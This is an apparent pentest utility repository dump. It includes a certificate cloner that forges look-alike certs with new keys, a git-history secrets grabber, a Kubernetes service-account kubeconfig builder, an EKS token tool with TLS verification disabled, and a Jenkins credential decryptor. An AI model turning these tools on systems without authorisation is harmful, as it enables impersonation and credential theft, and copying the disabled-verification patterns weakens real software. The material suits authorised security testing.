26 | self.methods = methods
27 | self.use_sni = use_sni
28 | self.cafile = cafile
29 | if not self.cafile:
30 | self.cafile = requests.certs.where() #get trusted ca file from requests module if not provided
31 | self.debug = debug
32 | self.force_verify = force_verify
33 | 
34 | 
35 | 
36 | def verify_cb(self, conn, cert, errnum, depth, ok):
37 | '''Provided as an alternate cert verify routine - not currently used'''
38 | self.certs.append(cert)
39 | return 1 # this verifies all certs
40 | 
41 | 
42 | def guess_root_cert(self, cert):
43 | '''Retrieve the probable signing certificate from a trust store based on a match between subject and issuer of provided intermediate cert'''
44 | issuer = self.get_issuer(cert)
45 | return [self.pem_to_x509(a) for a in self.get_trust_store_certs() if self.get_subject(a) == issuer]
46 | 
47 | 
48 | def pem_to_x509(self, cert):
49 | '''Convert PEM certificate to x509'''
50 | return crypto.load_certificate(crypto.FILETYPE_PEM, cert)
51 | 
52 | 
53 | def get_trust_store_certs(self):
54 | '''Get list of PEM certs from trust store - assuming newline separation between PEM certs in file'''
55 | return '\n'.join([a for a in open(self.cafile).read().split('\n') if not a.startswith('#')]).split('\n\n')
56 | 
57 | 
58 | def get_issuer(self, cert):
59 | '''Get issuer of cert in x509 or PEM form'''
60 | if not isinstance(cert, OpenSSL.crypto.X509):
61 | cert = self.pem_to_x509(cert)
62 | return asn1crypto.x509.Certificate.load(crypto.dump_certificate(crypto.FILETYPE_ASN1, cert)).issuer.human_friendly
63 | 
64 | 
65 | def get_subject(self, cert):
66 | '''Get subject of cert in x509 or PEM form'''
67 | if not isinstance(cert, OpenSSL.crypto.X509):
68 | cert = self.pem_to_x509(cert)
69 | return 
asn1crypto.x509.Certificate.load(crypto.dump_certificate(crypto.FILETYPE_ASN1, cert)).subject.human_friendly
70 | 
71 | 
72 | # this might be overkill but I have seen some suggestions online that a single pass through verify_certificate only does the intermediate chain
73 | def chain_verify(self, root, chain):
74 | '''Does a multi-step certificate chain verification, repeating the verify at each step of the given chain'''
75 | while len(chain) > 1:
76 | if self.verify_chain(root, chain):
77 | if self.debug:
78 | print('Chain verification, context length {}'.format(len(chain)))
79 | chain = chain[1:]
80 | else:
81 | return False
82 | return True
83 | 
84 | 
85 | def verify_chain(self, root, chain):
86 | '''Verify a certificate chain'''
87 | store = crypto.X509Store()
88 | for cert in chain[1:]:
89 | store.add_cert(cert)
90 | store.add_cert(root)
91 | store_ctx = crypto.X509StoreContext(store, chain[0])
92 | return False if store_ctx.verify_certificate() else True
93 | 
94 | 
95 | def get_certs(self):
96 | '''Connect to service and grab the full certificate chain'''
97 | self.certs = []
98 | for method in self.methods:
99 | # error handling for connection errors
100 | try:
101 | ctx = SSL.Context(getattr(SSL, method))
102 | 
103 | ctx.load_verify_locations(cafile=self.cafile)
104 | #ctx.set_verify(SSL.VERIFY_PEER, self.verify_cb) # alternate method of getting certs,
105 | sock = SSL.Connection(ctx, socket.socket(socket.AF_INET, socket.SOCK_STREAM))
106 | sock.settimeout(5)
107 | if self.use_sni:
108 | sock.set_tlsext_host_name(self.hostname.encode())
109 | sock.connect((self.hostname, self.port))
110 | sock.setblocking(1)
111 | sock.do_handshake()
112 | #sock.send('GET / HTTP/1.1\r\nHost: {}'.format(self.hostname).encode()) #also needed for sni????
113 | self.certs.append(sock.get_peer_certificate())
114 | for cert in sock.get_peer_cert_chain():
115 | if cert.get_serial_number() not in [a.get_serial_number() for a in self.certs]:
116 | self.certs.append(cert)
117 | if self.certs:
118 | if self.debug:
119 | print('Connection successful with method {}'.format(method.replace('_METHOD', '')))
120 | break
121 | except:
122 | if self.debug:
123 | print('Connection failure with method: {}'.format(method.replace('_METHOD', '')))
124 | pass
125 | 
126 | if not self.certs:
127 | raise Exception('Could not successfully connect to service and retrieve certificates')
128 | 
129 | # get the certs from the trust store that match based on simple string match issuer<->subject
130 | proot = self.guess_root_cert(self.certs[-1])
131 | root_cert = None
132 | # then run a verification routine against the probable matches to find the correct one
133 | for root in proot:
134 | if self.chain_verify(root, self.certs):
135 | self.certs.append(root)
136 | root_cert = root
137 | 
138 | if not root_cert:
139 | if self.debug:
140 | print('Matching verified root certificate not found')
141 | if self.force_verify:
142 | raise Exception('Could not verify chain to trusted root, you can try a different trust store or turn off force_verify to get the intermediate chain')
143 | 
144 | 
145 | return self.certs
146 | 
147 | 
148 | 
149 | 
150 | def dump_certs(certs, output='str'):
151 | '''Dumps human readable output in a number of formats from a list of openssl cert objects'''
152 | valid_outputs = ['str', 'json', 'json_friendly', 'str_exts', 'str_info', 'str_key']
153 | if not output in valid_outputs:
154 | return 'Valid output formats are: {}'.format(', '.join(valid_outputs))
155 | return 
getattr(cert_human.CertChainStore.from_pem('\n'.join([crypto.dump_certificate(crypto.FILETYPE_PEM,a).decode('utf8') for a in certs])), 'dump_{}'.format(output) )
156 | 
157 | 
158 | 
159 | # use this
160 | 
161 | # grabs the cert chain from the remote server and matches it with the root cert from local store
162 | #cc = SSLCertChecker('server.name', 443)
163 | #certs = cc.get_certs()
164 | 
165 | # dumps them all out in a big text based info dump
166 | #print(dump_certs(certs))
167 | 
168 | # intended for allowing analysis of all the relevant certs
169 | # is this a secure way of specifically verifying the cert chain? not so sure, do more research on this before making that conclusion
170 | # Check this for more: https://stackoverflow.com/questions/30700348/how-to-validate-verify-an-x509-certificate-chain-of-trust-in-python
-------------------------------------------------------------------------------- /utilities/clone_cert.py: --------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | 
3 | # clones the clonable fields from a cert provided from an input file
4 | # creates a new cert with a new private key
5 | 
6 | from OpenSSL import crypto
7 | from cryptography.hazmat.primitives import serialization
8 | import sys
9 | import base64
10 | 
11 | def copy_cert_disk(input_cert_filename, output_cert_base_filename):
12 | '''Read in cert in PEM format, write to disk various faked copies based on provided filename pattern'''
13 | try:
14 | fd = open(input_cert_filename).read()
15 | except Exception as ex:
16 | return 'Error: %s' %(ex)
17 | x509 = crypto.load_certificate(crypto.FILETYPE_PEM, fd)
18 | 
19 | # Creating key
20 | k = crypto.PKey()
21 | k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
22 | cert = crypto.X509()
23 | 
24 | # Setting cert details from the original certificate
25 | cert.set_version(x509.get_version())
26 | cert.set_serial_number(x509.get_serial_number())
27 | cert.set_subject(x509.get_subject())
28 | cert.set_issuer(x509.get_issuer())
29 | cert.set_notBefore(x509.get_notBefore())
30 | cert.set_notAfter(x509.get_notAfter())
31 | cert.set_pubkey(k)
32 | key1 = k.to_cryptography_key()
33 | 
34 | # add extensions
35 | cert.add_extensions([x509.get_extension(a) for a in range(0, x509.get_extension_count())])
36 | 
37 | sig = x509.get_signature_algorithm().decode('ascii')
38 | if 'WithRSAEncryption' not in sig:
39 | raise Exception('Error: RSA not used to sign cert. Signature algorithm: %s' %(sig))
40 | cert.sign(k, sig.replace('WithRSAEncryption', ''))
41 | 
42 | # Private key in traditional RSA PEM format - for SAML Raider import
43 | trsa = key1.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption())
44 | 
45 | # PFX file format
46 | pfx = crypto.PKCS12()
47 | pfx.set_privatekey(k)
48 | pfx.set_certificate(cert)
49 | pfxdata = pfx.export()
50 | pfxdata_pwd = pfx.export(passphrase=b'password') # for burp
51 | 
52 | 
53 | # Write all the things
54 | open(output_cert_base_filename + '.cer', 'w').write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'))
55 | open(output_cert_base_filename + '.key', 'w').write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8'))
56 | open(output_cert_base_filename + '_pub.key', 'w').write(crypto.dump_publickey(crypto.FILETYPE_PEM, k).decode('utf-8'))
57 | open(output_cert_base_filename + '_cert.der', 'wb').write(crypto.dump_certificate(crypto.FILETYPE_ASN1, cert))
58 | open(output_cert_base_filename + '_priv.der', 'wb').write(crypto.dump_privatekey(crypto.FILETYPE_ASN1, k))
59 | open(output_cert_base_filename + '_pub.der', 'wb').write(crypto.dump_publickey(crypto.FILETYPE_ASN1, k))
60 | open(output_cert_base_filename + '_trad_rsa.key', 'wb').write(trsa)
61 | open(output_cert_base_filename + '.pfx', 'wb').write(pfxdata)
62 | open(output_cert_base_filename + '_password.pfx', 'wb').write(pfxdata_pwd)
63 | open(output_cert_base_filename + '_socat.cer', 'w').write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8')+crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'))
64 | 
65 | 
66 | 
67 | 
68 | def copy_cert(cert):
69 | '''Read in cert in base64 encoded format, as embedded in a SAML message or similar, return dict with faked copies'''
70 | x509 = crypto.load_certificate(crypto.FILETYPE_ASN1, base64.b64decode(cert))
71 | 
72 | # Creating key
73 | k = crypto.PKey()
74 | k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
75 | cert = crypto.X509()
76 | 
77 | # Setting cert details from the original certificate
78 | cert.set_version(x509.get_version())
79 | cert.set_serial_number(x509.get_serial_number())
80 | cert.set_subject(x509.get_subject())
81 | cert.set_issuer(x509.get_issuer())
82 | cert.set_notBefore(x509.get_notBefore())
83 | cert.set_notAfter(x509.get_notAfter())
84 | cert.set_pubkey(k)
85 | key1 = k.to_cryptography_key()
86 | 
87 | # add extensions
88 | cert.add_extensions([x509.get_extension(a) for a in range(0, x509.get_extension_count())])
89 | 
90 | sig = x509.get_signature_algorithm().decode('ascii')
91 | if 'WithRSAEncryption' not in sig:
92 | raise Exception('Error: RSA not used to sign cert. 
Signature algorithm: %s' %(sig)) 93 | cert.sign(k, sig.replace('WithRSAEncryption', '')) 94 | 95 | # Private key in traditional RSA PEM format - for SAML Raider import 96 | trsa = key1.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption()) 97 | 98 | # PFX file format 99 | pfx = crypto.PKCS12() 100 | pfx.set_privatekey(k) 101 | pfx.set_certificate(cert) 102 | pfxdata = pfx.export() 103 | pfxdata_pwd = pfx.export(passphrase=b'password') # for burp 104 | 105 | return { 106 | 'cert' : crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'), 107 | 'key' : crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8'), 108 | 'pub' : crypto.dump_publickey(crypto.FILETYPE_PEM, k).decode('utf-8'), 109 | 'asn1_der_cert' : crypto.dump_certificate(crypto.FILETYPE_ASN1, cert), 110 | 'asn1_der_key' : crypto.dump_privatekey(crypto.FILETYPE_ASN1, k), 111 | 'asn1_der_pub' : crypto.dump_publickey(crypto.FILETYPE_ASN1, k), 112 | 'trad_rsa' : trsa, 113 | 'pfx' : pfxdata, 114 | 'pfx_password' : pfxdata_pwd, 115 | 'socat' : crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8')+crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'), 116 | 'crypto' : crypto 117 | } 118 | 119 | 120 | #if __name__ == "__main__": 121 | 122 | -------------------------------------------------------------------------------- /utilities/create_eks_auth_token.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import base64 3 | import boto3 4 | import argparse 5 | import sys 6 | import requests 7 | import os 8 | import json 9 | 10 | 11 | requests.packages.urllib3.disable_warnings() 12 | 13 | class MyParser(argparse.ArgumentParser): 14 | def error(self, message): 15 | sys.stderr.write('error: %s\n' % message) 16 | self.print_help() 17 | sys.exit(2) 18 | 19 | 20 | # a lot of this borrowed from 21 | # https://github.com/aws/aws-cli/blob/develop/awscli/customizations/eks/get_token.py 22 | 23 | 24 | # Presigned url timeout in seconds 25 | URL_TIMEOUT = 60 26 | TOKEN_EXPIRATION_MINS = 14 27 | K8S_AWS_ID_HEADER = 'x-k8s-aws-id' 28 | TOKEN_PREFIX = 'k8s-aws-v1.' 
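# The finished credential is simply TOKEN_PREFIX plus the base64url-encoded (padding
# stripped) presigned sts:GetCallerIdentity URL, so a captured token can be decoded for
# inspection; a quick sketch (the 'token' value here is an assumed input):
#
# import base64
# encoded = token[len(TOKEN_PREFIX):]
# print(base64.urlsafe_b64decode(encoded + '=' * (-len(encoded) % 4)).decode())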
29 | 30 | 31 | class TokenGenerator(object): 32 | def __init__(self, sts_client): 33 | self._sts_client = sts_client 34 | 35 | def get_token(self, k8s_aws_id): 36 | """Generate a presigned url token to pass to kubectl.""" 37 | url = self._get_presigned_url(k8s_aws_id) 38 | token = TOKEN_PREFIX + base64.urlsafe_b64encode( 39 | url.encode('utf-8') 40 | ).decode('utf-8').rstrip('=') 41 | return token 42 | 43 | def _get_presigned_url(self, k8s_aws_id): 44 | return self._sts_client.generate_presigned_url( 45 | 'get_caller_identity', 46 | Params={K8S_AWS_ID_HEADER: k8s_aws_id}, 47 | ExpiresIn=URL_TIMEOUT, 48 | HttpMethod='GET', 49 | ) 50 | 51 | 52 | class STSClientFactory(object): 53 | def __init__(self, session): 54 | self._session = session 55 | 56 | def get_sts_client(self, region_name=None, role_arn=None): 57 | client_kwargs = {'region_name': region_name} 58 | if role_arn is not None: 59 | creds = self._get_role_credentials(region_name, role_arn) 60 | client_kwargs['aws_access_key_id'] = creds['AccessKeyId'] 61 | client_kwargs['aws_secret_access_key'] = creds['SecretAccessKey'] 62 | client_kwargs['aws_session_token'] = creds['SessionToken'] 63 | sts = self._session.create_client('sts', **client_kwargs) 64 | self._register_k8s_aws_id_handlers(sts) 65 | return sts 66 | 67 | def _get_role_credentials(self, region_name, role_arn): 68 | sts = self._session.create_client('sts', region_name) 69 | return sts.assume_role( 70 | RoleArn=role_arn, RoleSessionName='EKSGetTokenAuth' 71 | )['Credentials'] 72 | 73 | def _register_k8s_aws_id_handlers(self, sts_client): 74 | sts_client.meta.events.register( 75 | 'provide-client-params.sts.GetCallerIdentity', 76 | self._retrieve_k8s_aws_id, 77 | ) 78 | sts_client.meta.events.register( 79 | 'before-sign.sts.GetCallerIdentity', 80 | self._inject_k8s_aws_id_header, 81 | ) 82 | 83 | def _retrieve_k8s_aws_id(self, params, context, **kwargs): 84 | if K8S_AWS_ID_HEADER in params: 85 | context[K8S_AWS_ID_HEADER] = params.pop(K8S_AWS_ID_HEADER) 86 | 87 | def _inject_k8s_aws_id_header(self, request, **kwargs): 88 | if K8S_AWS_ID_HEADER in request.context: 89 | request.headers[K8S_AWS_ID_HEADER] = request.context[K8S_AWS_ID_HEADER] 90 | 91 | 92 | def create_eks_token(session: boto3.session.Session=boto3.session.Session(), cluster_id: str=None) -> str: 93 | sclient = STSClientFactory(session._session).get_sts_client() 94 | tg = TokenGenerator(sclient) 95 | return tg.get_token(cluster_id) 96 | 97 | 98 | def kubernetes_whoami(token: str, host: str=None, port: int=None) -> dict: 99 | if not host: 100 | try: 101 | host = os.environ['KUBERNETES_SERVICE_HOST'] 102 | except Exception as e: 103 | print(f'Error in getting kubernetes host from environment: {str(e)}') 104 | sys.exit(1) 105 | if not port: 106 | try: 107 | port = int(os.environ['KUBERNETES_SERVICE_PORT_HTTPS']) 108 | except Exception as e: 109 | print(f'Error in getting kubernetes port from environment: {str(e)}') 110 | sys.exit(1) 111 | 112 | response = requests.post(f'https://{host}:{port}/apis/authentication.k8s.io/v1/selfsubjectreviews', json={}, headers={'Authorization': f'Bearer {token}'}, verify=False) 113 | if response.status_code == 200: 114 | return response.json() 115 | else: 116 | return response.content.decode() 117 | 118 | 119 | 120 | if __name__ == "__main__": 121 | parser = MyParser() 122 | parser.description = 'Create a token for use in authenticating to AWS EKS. If explicit credentials not supplied, boto3 will attempt to get them automatically from the system.' 
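# note: a token that authenticates is not by itself authorisation; the calling AWS
# principal also needs a mapping inside the cluster (aws-auth ConfigMap or EKS access
# entries) before the whoami test below will return useful identity data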
123 |     parser.add_argument('-c', '--cluster_id', type=str, required=True, help='EKS cluster name or cluster id. REQUIRED.')
124 |     parser.add_argument('-i', '--aws_access_key_id', type=str, default=None, help='AWS Access Key')
125 |     parser.add_argument('-k', '--aws_secret_access_key', type=str, default=None, help='AWS Secret Access Key')
126 |     parser.add_argument('-s', '--aws_session_token', type=str, default=None, help='AWS Session Token')
127 |     parser.add_argument('-t', '--test_whoami', action='store_true', help='Test the token is valid using whoami instead of printing the token to stdout')
128 |     parser.add_argument('-a', '--kubernetes_api_host', type=str, default=None, help='Kubernetes API host to use for whoami testing. Auto detected from environment if not specified.')
129 |     parser.add_argument('-p', '--kubernetes_api_port', type=int, default=None, help='Kubernetes API port to use for whoami testing. Auto detected from environment if not specified.')
130 |     args = parser.parse_args()
131 | 
132 |     if args.aws_access_key_id and not args.aws_secret_access_key:
133 |         print('If you provide an aws_access_key_id you must also supply at least an aws_secret_access_key')
134 |         sys.exit(1)
135 | 
136 |     params = {}
137 |     if args.aws_access_key_id:
138 |         params = {a: getattr(args,a) for a in dir(args) if a.startswith('aws')}
139 | 
140 |     session = boto3.session.Session(**params)
141 |     token = create_eks_token(session=session, cluster_id=args.cluster_id)
142 |     if args.test_whoami:
143 |         whoami = kubernetes_whoami(token, host=args.kubernetes_api_host, port=args.kubernetes_api_port)
144 |         userInfo = whoami.get('status', {}).get('userInfo')
145 |         if userInfo:
146 |             print(json.dumps(userInfo, indent=4))
147 |         else:
148 |             print(f'Whoami returned unexpected output: {whoami}')
149 |     else:
150 |         print(token)
151 | 
152 | 
--------------------------------------------------------------------------------
/utilities/create_kubeconfig.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | if [ $# -eq 0 ]
3 | then
4 |     echo "Provide directory containing service account credentials as parameter 1"
5 |     exit 1
6 | fi
7 | 
8 | DIRECTORY="$1"
9 | CLUSTER_NAME='kubernetes'
10 | SERVER="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}"
11 | NAMESPACE=$(cat $DIRECTORY/namespace)
12 | TOKEN=$(cat $DIRECTORY/token)
13 | CA=$(cat $DIRECTORY/ca.crt | base64 -w 0)
14 | 
15 | if ! command jwt 2>&1| grep '\-show' > /dev/null
16 | then
17 |     SERVICE_ACCOUNT='service-account'
18 | else
19 |     SERVICE_ACCOUNT=$(cat $DIRECTORY/token | jwt -show - | grep '"serviceaccount":' -A 1 | grep name | cut -d ':' -f 2 | cut -d '"' -f 2)
20 | fi
21 | 
22 | echo "
23 | ---
24 | apiVersion: v1
25 | kind: Config
26 | clusters:
27 | - name: ${CLUSTER_NAME}
28 |   cluster:
29 |     certificate-authority-data: ${CA}
30 |     server: ${SERVER}
31 | contexts:
32 | - name: ${SERVICE_ACCOUNT}@${CLUSTER_NAME}
33 |   context:
34 |     cluster: ${CLUSTER_NAME}
35 |     namespace: ${NAMESPACE}
36 |     user: ${SERVICE_ACCOUNT}
37 | users:
38 | - name: ${SERVICE_ACCOUNT}
39 |   user:
40 |     token: ${TOKEN}
41 | current-context: ${SERVICE_ACCOUNT}@${CLUSTER_NAME}
42 | "
--------------------------------------------------------------------------------
/utilities/git_analysis.py:
--------------------------------------------------------------------------------
1 | import subprocess
2 | import datetime
3 | import glob
4 | import json
5 | import os
6 | import hashlib
7 | import gzip
8 | 
9 | ####################################
10 | # Analysis process
11 | ####################################
12 | # run "git_secrets_grabber('git_parent_directory')" - returns a hash that has entries for each discovered repository under parent dir, and subentries for each search term -> repo:word with subkeys raw, parsed, search
13 | # look at "search" output for each search string, identify the valid results (any unique part of the matching line), add them to a "results" key for each repo:word hash entry
14 | # once you're done, process with "gitsearch_results_parser" function - it finds entries that have the strings from "results" in them
15 | # can save outputs with json_file_write_gz, json_file_write functions
16 | # can further parse output with "git_results_file_data" function, easily show results etc
17 | 
18 | # output can be (for git results gr):
19 | # * files for each repo containing secrets - print('\n'.join(sorted(gr[repo].keys())))
20 | # * matching lines and line numbers showing content matching the search terms, check you are outputting correct results - git_results_file_data(gr)
21 | # * appendix data = git_results_file_data(data, contents=['matches', 'commits'])
22 | ####################################
23 | 
24 | 
25 | ####################################
26 | # Automation of these commands
27 | # git grep -in 'search_string' $(git rev-list --all)
28 | # git show <commit>:<path/to/file>
29 | 
30 | #filename search
31 | #git rev-list --all | xargs -I '{}' git ls-tree --full-tree -r '{}' | grep target_filename.txt | sort -u
32 | 
33 | ####################################
34 | 
35 | git = '/usr/bin/git'
36 | # search terms to look for in each repo
37 | words = [
38 |     'access',
39 |     'key',
40 |     'password',
41 |     'secret',
42 |     'token'
43 | ]
44 | 
45 | 
46 | parser = lambda x : [a.split(':', 3) for a in x.split('\n') if a]
47 | 
48 | def timestamp():
49 |     return datetime.datetime.now().strftime('%Y%m%d%H%M%S')
50 | 
51 | 
52 | def get_gitdir(base):
53 |     '''Get git repos recursively under a provided parent directory'''
54 |     return [a[::-1].replace('/.git'[::-1], '', 1)[::-1] for a in glob.iglob('{}/**/.git'.format(base.rstrip('/')), recursive=True)]
55 | 
56 | 
57 | def git_rev_list(git_command, repo):
58 |     '''Get list of commits from a git repo'''
59 |     proc = subprocess.Popen([git_command, 'rev-list', '--all'], stdout=subprocess.PIPE, bufsize=1024000, cwd=repo)
60 |     out = [a for a in proc.stdout.read().decode('UTF-8').split('\n') if a]
61 |     proc.terminate()
62 |     return out
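# Worked example of the data flow (an added sketch - the hash, path and line are made up):
# a raw line from "git grep -in <word> <revs>" looks like
#   d3adb33f...:config/settings.py:14:password = 'hunter2'
# and parser() splits it on the first three colons into
#   ['d3adb33f...', 'config/settings.py', '14', "password = 'hunter2'"]
# which is the [commit, filename, line, match] layout that the 'parsed' entries built
# below rely on (filenames containing colons would need a smarter split).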
63 | 
64 | 
65 | def git_grep(git_command, search_pattern, repo):
66 |     '''Run git grep command against all commits in a repo, case insensitive, providing line number of match'''
67 |     revlist = git_rev_list(git_command, repo)
68 |     proc = subprocess.Popen([git_command, 'grep', '-in', search_pattern] + revlist, stdout=subprocess.PIPE, bufsize=1024000, cwd=repo)
69 |     out = proc.stdout.read().decode('UTF-8')
70 |     proc.terminate()
71 |     return out
72 | 
73 | 
74 | 
75 | #git show REVISION:path/to/file
76 | def git_get_file(repo, revision, file_path, git_command=git):
77 |     proc = subprocess.Popen([git_command, 'show', '{}:{}'.format(revision, file_path) ], stdout=subprocess.PIPE, bufsize=1024000, cwd=repo)
78 |     out = proc.stdout.read().decode('UTF-8')
79 |     proc.terminate()
80 |     return out
81 | 
82 | 
83 | 
84 | def git_secrets_grabber(basedir, words=words, git_command=git):
85 |     '''Grab git secrets of all repos underneath provided parent directory'''
86 |     repos = get_gitdir(basedir)
87 | 
88 |     data = {}
89 | 
90 |     for repo in repos:
91 |         data[repo] = {}
92 |         for word in words:
93 |             data[repo][word] = {}
94 |             data[repo][word]['raw'] = git_grep(git_command, word, repo)
95 |             data[repo][word]['parsed'] = parser(data[repo][word]['raw'])
96 |             data[repo][word]['search'] = sorted(set([a[-1] for a in data[repo][word]['parsed']]))
97 |     return data
98 | 
99 | 
100 | def sha1hash(data):
101 |     return hashlib.sha1(data.encode()).hexdigest()
102 | 
103 | 
104 | def json_file_write_gz(filebase, data):
105 |     gzip.open('{}_{}.json.gz'.format(filebase, timestamp()) ,'w' ).write(json.dumps(data, indent=4, sort_keys=True).encode())
106 | 
107 | 
108 | def json_file_write(filebase, data):
109 |     open('{}_{}.json'.format(filebase, timestamp()) ,'w' ).write(json.dumps(data, indent=4, sort_keys=True))
110 | 
111 | 
112 | def json_file_read_gz(filename):
113 |     return json.loads(gzip.open(filename).read())
114 | 
115 | 
116 | def json_file_read(filename):
117 |     return json.loads(open(filename).read())
118 | 
119 | 
120 | # produces hash
121 | # repo:filename:fileinstance:[commits:matches]
122 | # fileinstance is a sha1 hash of the file content
123 | 
124 | # add to results subkey under search entry and run me
125 | def gitsearch_results_parser(data):
126 |     out = {}
127 |     for repo in data.keys():
128 |         out[repo] = {}
129 |         for search_pattern in data[repo].keys():
130 |             if 'results' in data[repo][search_pattern]:
131 |                 for result in data[repo][search_pattern]['results']:
132 |                     dictme = lambda y : {k: v for k,v in zip(['commit', 'filename', 'line', 'match'], y) }
133 | 
134 |                     for match in [dictme(a) for a in data[repo][search_pattern]['parsed'] if result in a[-1] ]:
135 | 
136 |                         if match['filename'] not in out[repo]:
137 |                             out[repo][match['filename']] = {}
138 | 
139 |                         fc = git_get_file(repo, match['commit'], match['filename'])
140 |                         fh = sha1hash(fc)
141 | 
142 |                         if fh not in out[repo][match['filename']]:
143 |                             out[repo][match['filename']][fh] = {}
144 |                             out[repo][match['filename']][fh]['content'] = fc
145 |                             out[repo][match['filename']][fh]['commits'] = []
146 |                             out[repo][match['filename']][fh]['matches'] = []
147 | 
148 | 
149 |                         if match['commit'] not in out[repo][match['filename']][fh]['commits']:
150 |                             out[repo][match['filename']][fh]['commits'].append(match['commit'])
151 | 
152 |                         if [match['line'], match['match']] not in out[repo][match['filename']][fh]['matches']:
153 |                             out[repo][match['filename']][fh]['matches'].append([match['line'], match['match']])
154 | 
155 |     return out
156 | 
157 | 
158 | # content, matches, commits are valid values for contents
159 | def git_results_file_data(data, repos=None, filenames=None, contents=['matches']):
160 |     hashable_parser = lambda x : tuple(x) if isinstance(x, list) else x
161 |     out = {}
162 |     if repos == None:
163 |         repos = list(data.keys())
164 | 
165 |     for repo in (a for a in data.keys() if a in repos):
166 |         out[repo] = {}
167 |         if filenames == None:
168 |             cfilenames = list(data[repo].keys())
169 |         else:
170 |             cfilenames = filenames
171 |         for filename in [a for a in data[repo].keys() if a in cfilenames]:
172 |             if not filename in out[repo]:
173 |                 out[repo][filename] = {}
174 |                 for content in contents:
175 |                     out[repo][filename][content] = []
176 | 
177 |             for fileinstance in data[repo][filename].keys():
178 |                 for content in contents:
179 |                     if data[repo][filename][fileinstance][content] not in out[repo][filename][content]:
180 |                         out[repo][filename][content].append(data[repo][filename][fileinstance][content])
181 |             for content in contents:
182 |                 out[repo][filename][content] = out[repo][filename][content] if content == 'content' else list(set([hashable_parser(b) for a in out[repo][filename][content] for b in a]))
183 | 
184 |     return out
185 | 
186 | 
187 | 
188 | # repo:filename:fileinstance:[commits:matches]
189 | # filename:
190 | # for an instance
191 | # -> commits
192 | # -> line numbers with secrets
193 | 
194 | 
195 | def appendix_data(data, repos=None):
196 |     out = {}
197 |     if repos == None:
198 |         repos = list(data.keys())
199 | 
200 |     for repo in (a for a in data.keys() if a in repos):
201 |         out[repo] = {}
202 |         for filename in data[repo].keys():
203 |             out[repo][filename] = []
204 |             for fileinstance in data[repo][filename].keys():
205 |                 out[repo][filename].append({'matches' : [a[0] for a in data[repo][filename][fileinstance]['matches']], 'commits' : data[repo][filename][fileinstance]['commits']})
206 |     return out
207 | 
208 | 
209 | def appendix_printer(data, repos=None):
210 |     out = ''
211 |     dd = appendix_data(data, repos=repos)
212 |     for repo in dd.keys():
213 |         out+=repo.split('/')[-1]+'\n'
214 |         for filename in dd[repo].keys():
215 |             out+='\t{}'.format(filename)+'\n'
216 |             for entry in dd[repo][filename]:
217 |                 out+='\t\tIn a unique instance of the file found in the commits below, the following lines contained identified secrets: ({})'.format(', '.join(entry['matches']))+'\n'
218 |                 for commit in entry['commits']:
219 |                     out+='\t\t{}'.format(commit)+'\n'
220 |     out+='\n'
221 |     return out
222 | 
223 | 
224 | def csv_output(data, repos=None):
225 |     out = 'Repository,Filename,Commit,Line_Numbers\n'
226 |     dd = appendix_data(data, repos=repos)
227 |     for repo in dd.keys():
228 |         bline=repo.split('/')[-1]+','
229 |         for filename in sorted(dd[repo].keys()):
230 |             line=bline+filename
231 |             for entry in dd[repo][filename]:
232 |                 for commit in entry['commits']:
233 |                     out+='{},{},{}\n'.format(line, commit, ';'.join(entry['matches']))
234 |     return out
235 | 
236 | 
--------------------------------------------------------------------------------
/utilities/jenkins-decrypt.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | 
3 | # Tidied from https://github.com/tweksteen/jenkins-decrypt and updated for python 3.10
4 | #
5 | # install pycryptodome for the requirements...
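# Typical invocation (an added sketch - paths assume a default Jenkins home layout):
#   ./jenkins-decrypt.py $JENKINS_HOME/secrets/master.key $JENKINS_HOME/secrets/hudson.util.Secret $JENKINS_HOME/credentials.xml
# master.key is hashed (SHA-256, first 16 bytes) into the AES key that unwraps
# hudson.util.Secret, which in turn decrypts the secret values in credentials.xml.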
6 | 
7 | import re
8 | import sys
9 | import base64
10 | from hashlib import sha256
11 | from Crypto.Cipher import AES
12 | 
13 | MAGIC = b"::::MAGIC::::"
14 | 
15 | def usage():
16 |     print("./decrypt.py <master.key> <hudson.util.Secret> <credentials.xml>")
17 |     sys.exit(0)
18 | 
19 | def decryptNewPassword(secret, p):
20 |     p = p[1:] #Strip the version
21 | 
22 |     # Get the length of the IV, almost certainly 16 bytes, but calculating for completeness sake
23 |     iv_length = ((p[0] & 0xff) << 24) | ((p[1] & 0xff) << 16) | ((p[2] & 0xff) << 8) | (p[3] & 0xff)
24 | 
25 |     # Strip the iv length
26 |     p = p[4:]
27 | 
28 |     # Get the data length
29 |     data_length = ((p[0] & 0xff) << 24) | ((p[1] & 0xff) << 16) | ((p[2] & 0xff) << 8) | (p[3] & 0xff)
30 | 
31 |     # Strip the data length
32 |     p = p[4:]
33 | 
34 |     iv = p[:iv_length]
35 | 
36 |     p = p[iv_length:]
37 | 
38 |     o = AES.new(secret, AES.MODE_CBC, iv)
39 | 
40 |     decrypted_p = o.decrypt(p)
41 | 
42 |     # We may need to strip PKCS7 padding
43 |     fully_decrypted_blocks = decrypted_p[:-16]
44 |     possibly_padded_block = decrypted_p[-16:]
45 |     padding_length = possibly_padded_block[-1]
46 |     if padding_length <= 16: # Less than size of one block, so we have padding
47 |         possibly_padded_block = possibly_padded_block[:-padding_length]
48 | 
49 |     pw = fully_decrypted_blocks + possibly_padded_block
50 |     pw = pw.decode('utf-8')
51 |     return pw
52 | 
53 | 
